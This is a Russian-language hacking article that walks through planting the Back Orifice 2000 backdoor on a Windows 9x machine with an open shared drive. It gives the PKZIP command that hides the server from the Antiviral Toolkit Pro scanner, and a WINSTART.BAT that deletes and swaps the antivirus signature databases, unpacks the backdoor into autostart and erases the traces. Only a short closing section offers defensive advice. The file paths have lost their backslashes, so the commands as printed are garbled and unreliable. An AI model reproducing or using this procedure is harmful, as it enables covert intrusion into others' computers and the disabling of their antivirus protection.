Данный метод работает только на Windows 9x русских версиях (для английских версий необходимо подправить каталог автозапуска), а также при инсталляции Antiviral Toolkit Pro в c:program filesantiviral toolkit pro (по умолчанию). Цель данной статьи - показать способ взлома вашего компьютера. Автор не несет никакой ответственности за ущерб, который может быть следствием прочтения этого сообщения.
Рассмотрим следующую ситуацию: есть хост, имеющий общий ресурс С с полным доступом, установленным Antiviral Toolkit Pro. Как положить на него backdoor? Для этого надо заархивировать с паролем (BackdooR) сервер бакдора (будем использовать Back Oriffice 2000). Пароль используется для того, чтобы AVP сканер не смог обнаружить сервер бакдора:
>PKZIP.EXE -a -sBackooR asyslg.dll BO2K.EXE
Теперь AVP не сможет увидеть сигнатуры BO2k в ASYSLG.DLL (если установлена опция проверки архивов).
Затем необходимо обеспечить запуск сервера и обезвредить AVP. Для этого напишем BAT-файл:
@echo off
attrib -R c:progra~1antivi~1ackdoor.avc >nul
attrib -R c:progra~1antivi~1 rojan.avc >nul
del c:progra~1antivi~1ackdoor.avc >nul
del c:progra~1antivi~1 rojan.avc >nul
copy c:progra~1antivi~1macro.avc c:progra~1antivi~1ackdoor.avc >nul
copy c:progra~1antivi~1mail.avc c:progra~1antivi~1 rojan.avc >nul
c:windowspkunzip.exe -e -sBackdooR c:windowsASYSLG.DLL
C:WindowsГЛАВНО~1ПРОГРА~1АВТОЗА~1 >nul
del c:windowspkunzip.exe >nul
del c:windowsasyslg.dll >nul
del c:winstart.bat >nul
echo on
Расшифровка построчно:
отключение вывода на экран выполняемых команд
снятие атрибута READONLY с файла backdoor.avc (база сигнатур для бакдоров)
снятие атрибута READONLY с файла tojan.avc (база сигнатур для троянов)
удаление файла backdoor.avc
удаление файла tojan.avc
подмена базы (для того, чтобы при запуске сканера AVP не ругался)
подмена базы (отсутствие базы)
разархивация бакдора и помещение его автозагрузку
удаление PKUNZIP
удаление архива с бакдором
удаление файлы запуска
Почему это будет работать? Потому что при старте Windows если в главном каталоге находится файл WINSTART.BAT он запускается на выполнение. При этом пользователь не увидит ни одного сообщения. Затем необходимо скопировать на удаленный компьютер следующие файлы:
ASYSLG.DLL в директорию c:windows
PKUNZIP.EXE в директорию c:windows
WINSTART.BAT в директорию c:
Итого необходимо будет закачать 86.508 байт.
Все. После перезагрузки на компьютере из автозагрузки запустится сервер, удалит себя оттуда и запишет себя в c:windowssystem (сервер должен быть сконфигурирован на удаление оригинального файла). В принципе, можно использовать архиватор CAB, и проводить распаковывание программой EXTRACT.EXE, которая присутствуют на почти всех компьютерах, что позволит уменьшить размер перекачиваемых данных, однако данный архиватор не позволяет архивировать с паролем, что может привести к обнаружению сервера бакдора сканером (если включена опция проверки архивов).
Рекомендации по защите от данного вида атаки:
Закройте все общие ресурсы! Если вы без них жить не можете установите на них пароль (не менее 6 символов и не менее 1 спецсимвола).
Поставьте себе Firewall. Даже если эта атака пройдет успешной, получить доступ к вашей системе не удастся - Firewall вас сразу же предупредит о попытке проникновения. Я рекомендую Tiny Personal Firewall.
При обнаружении и внезапной пропажи каких-то файлов сразу проверяйте свои диски антивирусом, а также проводите профилактическое сканирование дисков не менее одного раза в неделю.
Своевременно обновляйте антивирусные базы.